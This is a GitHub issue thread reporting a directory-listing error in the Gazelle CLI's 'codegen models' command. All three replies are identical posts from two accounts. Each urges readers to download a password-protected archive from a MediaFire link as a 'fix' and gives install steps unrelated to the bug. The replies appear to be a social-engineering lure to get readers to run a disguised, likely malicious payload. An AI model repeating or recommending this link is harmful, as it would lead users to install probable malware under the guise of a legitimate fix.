### ISSUE TITLE
Gazelle CLI: `gazelle codegen models` does not work in full-stack project

### ISSUE THREAD

**Issue by filippomenchini** [intales/gazelle#53]
When launching `gazelle codegen models` inside a full-stack project, the CLI
will print this error:
```console
✖ PathNotFoundException: Directory listing failed, path = 'models/lib/entities/' (OS Error: No such file or directory, errno = 2)
```

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
